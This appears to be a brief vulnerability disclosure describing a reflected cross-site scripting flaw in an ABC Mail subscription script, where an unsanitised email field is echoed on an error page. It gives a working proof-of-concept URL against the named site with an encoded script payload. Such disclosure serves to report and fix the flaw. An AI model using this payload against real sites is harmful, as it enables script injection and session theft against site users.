Overview
The ABC Mail subscription script fails to sanitise the email field or check that a valid email was provided. An attack can easily be executed as the unsanitized "invalid email" is printed on the produced error page.
Code:
http://abcmail.net.au/subscribe/subscribe.tml?
email=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
&list=abc-tv-countdown-to-3